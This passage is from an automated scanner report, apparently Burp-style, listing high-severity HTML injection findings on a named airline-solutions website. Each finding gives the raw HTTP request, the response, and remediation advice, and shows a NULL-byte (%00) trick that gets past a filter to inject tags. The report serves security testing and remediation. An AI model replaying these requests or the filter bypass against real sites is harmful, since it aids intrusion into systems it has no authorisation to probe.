The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00dab69"><a>b2f5fb7df3c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dab69"><a>b2f5fb7df3c in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/news_events/events/?%00dab69"><a>b2f5fb7df3c=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286320657; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 20:00:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1286326810; expires=Wed, 05-Oct-2011 20:00:10 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fnews_events%2Fevents%2F%22%3Bi%3A1%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 05 Oct 2010 20:00:23 GMT
Pragma: no-cache
Content-Length: 7654
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="/home/news_events/events/?%00dab69"><a>b2f5fb7df3c=1">
...[SNIP]...

3.116. http://www.sabreairlinesolutions.com/home/news_events/news [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/news_events/news

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %0014294<a>0ea98cb94ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 14294<a>0ea98cb94ed in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/news_events/news?%0014294<a>0ea98cb94ed=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321531; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3Bi%3A3%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A4%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:36:47 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321531; expires=Thu, 06-Oct-2011 09:36:56 GMT; path=/
Set-Cookie: exp_last_activity=1286375816; expires=Thu, 06-Oct-2011 09:36:56 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fnews_events%2Fnews%2F%22%3Bi%3A1%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3Bi%3A4%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:37:03 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a>0ea98cb94ed=1">news?%0014294<a>0ea98cb94ed=1</a>
...[SNIP]...

3.117. http://www.sabreairlinesolutions.com/home/news_events/news [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/news_events/news

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0026cff"><a>7455c9888f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 26cff"><a>7455c9888f8 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/news_events/news?%0026cff"><a>7455c9888f8=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321531; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3Bi%3A3%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A4%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:31:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321531; expires=Thu, 06-Oct-2011 09:31:46 GMT; path=/
Set-Cookie: exp_last_activity=1286375505; expires=Thu, 06-Oct-2011 09:31:46 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fnews_events%2Fnews%2F%22%3Bi%3A1%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3Bi%3A4%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:32:11 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13022

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="/home/news_events/news?%0026cff"><a>7455c9888f8=1">
...[SNIP]...

3.118. http://www.sabreairlinesolutions.com/home/news_events/news/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/news_events/news/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0056b62"><a>45a3e4cc837 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 56b62"><a>45a3e4cc837 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/news_events/news/?%0056b62"><a>45a3e4cc837=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286320657; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 20:06:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1286327206; expires=Wed, 05-Oct-2011 20:06:46 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fnews_events%2Fnews%2F%22%3Bi%3A1%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 05 Oct 2010 20:06:56 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13066

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="/home/news_events/news/?%0056b62"><a>45a3e4cc837=1">
...[SNIP]...

3.119. http://www.sabreairlinesolutions.com/home/products_services [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d6be4"><a>c4f7a80bf90 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d6be4"><a>c4f7a80bf90 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/products_services?%00d6be4"><a>c4f7a80bf90=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: exp_last_visit=970952799; exp_last_activity=1286312799; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 17:03:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1286316204; expires=Wed, 05-Oct-2011 17:03:24 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 05 Oct 2010 17:03:38 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 22922


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/products_services?%00d6be4"><a>c4f7a80bf90=1">
...[SNIP]...

3.120. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/downloads/images [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/airline_reservations/downloads/images

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0051ca8"><a>bab4ffaf8c9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 51ca8"><a>bab4ffaf8c9 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/products_services/airline_reservations/downloads/images?%0051ca8"><a>bab4ffaf8c9=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/downloads/images/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323079; __utmb=178985382.1.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 06:36:03 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286323079; expires=Thu, 06-Oct-2011 06:36:05 GMT; path=/
Set-Cookie: exp_last_activity=1286364964; expires=Thu, 06-Oct-2011 06:36:05 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A57%3A%22%2Fproducts_services%2Fairline_reservations%2Fdownloads%2Fimages%2F%22%3Bi%3A1%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A2%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 06:36:44 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 20199


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<a href="/home/products_services/airline_reservations/downloads/images?%0051ca8"><a>bab4ffaf8c9=1">
...[SNIP]...

3.121. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/downloads/images [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/airline_reservations/downloads/images

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00aa1d2<a>e23a0079847 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as aa1d2<a>e23a0079847 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/products_services/airline_reservations/downloads/images?%00aa1d2<a>e23a0079847=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/downloads/images/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323079; __utmb=178985382.1.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 06:41:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286323079; expires=Thu, 06-Oct-2011 06:42:01 GMT; path=/
Set-Cookie: exp_last_activity=1286365320; expires=Thu, 06-Oct-2011 06:42:01 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A57%3A%22%2Fproducts_services%2Fairline_reservations%2Fdownloads%2Fimages%2F%22%3Bi%3A1%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A2%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 06:42:50 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 20195


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<a>e23a0079847=1">images?%00aa1d2<a>e23a0079847=1</a>
...[SNIP]...

3.122. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/downloads/images/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/airline_reservations/downloads/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %006e97a"><a>667bede4c97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6e97a"><a>667bede4c97 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/products_services/airline_reservations/downloads/images/?%006e97a"><a>667bede4c97=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323079; __utmb=178985382.1.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 06:06:03 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286323079; expires=Thu, 06-Oct-2011 06:06:25 GMT; path=/
Set-Cookie: exp_last_activity=1286363185; expires=Thu, 06-Oct-2011 06:06:25 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A57%3A%22%2Fproducts_services%2Fairline_reservations%2Fdownloads%2Fimages%2F%22%3Bi%3A1%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A2%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 06:06:32 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 20282


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<a href="/home/products_services/airline_reservations/downloads/images/?%006e97a"><a>667bede4c97=1">
...[SNIP]...

3.123. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/downloads/images/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/airline_reservations/downloads/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %0080152<a>de13aac6848 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 80152<a>de13aac6848 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/products_services/airline_reservations/downloads/images/?%0080152<a>de13aac6848=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323079; __utmb=178985382.1.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 06:11:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286323079; expires=Thu, 06-Oct-2011 06:11:47 GMT; path=/
Set-Cookie: exp_last_activity=1286363507; expires=Thu, 06-Oct-2011 06:11:47 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A57%3A%22%2Fproducts_services%2Fairline_reservations%2Fdownloads%2Fimages%2F%22%3Bi%3A1%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A2%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 06:12:24 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 20278


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<a>de13aac6848=1">?%0080152<a>de13aac6848=1</a>
...[SNIP]...

3.124. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/more_customers/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/airline_reservations/more_customers/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f85dc"><a>dfdeaf77316 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f85dc"><a>dfdeaf77316 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/products_services/airline_reservations/more_customers/?%00f85dc"><a>dfdeaf77316=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/
